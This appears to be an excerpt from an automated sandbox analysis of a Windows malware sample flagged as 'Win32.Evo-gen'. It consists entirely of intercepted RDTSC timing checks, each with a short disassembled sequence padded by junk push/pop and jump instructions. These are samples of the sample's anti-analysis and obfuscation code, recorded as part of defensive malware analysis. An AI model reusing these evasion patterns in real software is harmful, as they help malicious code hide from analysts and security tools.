Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D863E second address: 10D8643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D8643 second address: 10D8664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D81h 0x00000009 jns 00007F449CC63D76h 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D87BD second address: 10D87C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F449CEB0736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D87C7 second address: 10D87CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10E67A5 second address: 10E67AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10E67AB second address: 10E67C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D89h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10E67C9 second address: 10E67D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10F7E72 second address: 10F7E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10F7E7E second address: 10F7E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10F7E83 second address: 10F7E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10F7E89 second address: 10F7E96 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111556F second address: 1115575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1115575 second address: 1115579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1115579 second address: 1115587 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1115587 second address: 11155A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CEB0745h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 11143B0 second address: 11143B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 11143B4 second address: 11143E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jno 00007F449CEB074Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F449CEB0736h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111457B second address: 1114587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 js 00007F449CC63D76h 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1114701 second address: 1114709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1114709 second address: 1114713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F449CC63D76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1114D18 second address: 1114D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 js 00007F449CEB0736h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1114D27 second address: 1114D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1116C39 second address: 1116C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111AEC9 second address: 111AECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111AECD second address: 111AEEB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F449CEB073Eh 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111AEEB second address: 111AEF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111AEF0 second address: 111AEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111AFB3 second address: 111AFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111AFB7 second address: 111AFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111AFBD second address: 111B011 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F449CC63D7Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007F449CC63D80h 0x0000001f push ebx 0x00000020 pushad 0x00000021 popad 0x00000022 pop ebx 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111B25F second address: 111B263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 111B263 second address: 111B2BF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e or dx, E466h 0x00000013 jmp 00007F449CC63D88h 0x00000018 push dword ptr [ebp+122D3206h] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F449CC63D78h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push 60DC85E5h 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 push eax 0x00000041 pop eax 0x00000042 pop esi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620159 second address: 56201E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F449CEB0740h 0x0000000f push eax 0x00000010 jmp 00007F449CEB073Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F449CEB0746h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f jmp 00007F449CEB073Dh 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007F449CEB0747h 0x0000002d or al, FFFFFFDEh 0x00000030 jmp 00007F449CEB0749h 0x00000035 popfd 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600DD8 second address: 5600DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600DDE second address: 5600E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, DC33h 0x00000007 mov si, 088Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F449CEB073Eh 0x00000018 or eax, 26B49438h 0x0000001e jmp 00007F449CEB073Bh 0x00000023 popfd 0x00000024 movzx esi, bx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600E15 second address: 5600E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 565003F second address: 5650043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5650043 second address: 5650052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5650052 second address: 5650058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5650058 second address: 565005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 565005C second address: 5650060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5650060 second address: 5650078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F449CC63D7Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5650078 second address: 5650088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CEB073Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0140 second address: 55E0150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0150 second address: 55E0154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0154 second address: 55E01D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F449CC63D7Ah 0x00000010 sub al, 00000078h 0x00000013 jmp 00007F449CC63D7Bh 0x00000018 popfd 0x00000019 push ecx 0x0000001a jmp 00007F449CC63D7Fh 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 jmp 00007F449CC63D7Fh 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F449CC63D7Bh 0x00000032 sub ah, FFFFFF9Eh 0x00000035 jmp 00007F449CC63D89h 0x0000003a popfd 0x0000003b popad 0x0000003c push dword ptr [ebp+04h] 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E01D2 second address: 55E01D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E01D6 second address: 55E01DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E01DC second address: 55E01FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E01FA second address: 55E0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F449CC63D83h 0x0000000a add ecx, 489B4E0Eh 0x00000010 jmp 00007F449CC63D89h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0233 second address: 55E0251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0251 second address: 55E0255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0255 second address: 55E025B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0290 second address: 55E0296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0296 second address: 55E029A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E029A second address: 55E02C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F449CC63D80h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E02C0 second address: 55E02C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E02C4 second address: 55E02CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E02CA second address: 55E02D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600AF5 second address: 5600AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600AF9 second address: 5600B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600B15 second address: 5600B2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 287E72FBh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600B2A second address: 5600B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56006CE second address: 56006D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56006D2 second address: 56006D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600660 second address: 5600689 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 call 00007F449CC63D87h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ebx, 2B53A8C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600361 second address: 5600367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600367 second address: 560036B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 560036B second address: 56003B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F449CEB0746h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F449CEB0740h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F449CEB0740h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56003B4 second address: 56003D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5610129 second address: 5610130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5610130 second address: 5610169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F449CC63D7Ah 0x00000009 sub cx, 7E18h 0x0000000e jmp 00007F449CC63D7Bh 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F449CC63D81h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5610169 second address: 56101B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bh 0x00000005 pushfd 0x00000006 jmp 00007F449CEB0748h 0x0000000b jmp 00007F449CEB0745h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F449CEB073Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56101B0 second address: 56101E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F449CC63D88h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56101E3 second address: 56101E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56101E9 second address: 56101EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56101EF second address: 56101F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5640E92 second address: 5640E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5640E98 second address: 5640E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5640E9C second address: 5640EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F449CC63D82h 0x00000015 or cx, BC08h 0x0000001a jmp 00007F449CC63D7Bh 0x0000001f popfd 0x00000020 call 00007F449CC63D88h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
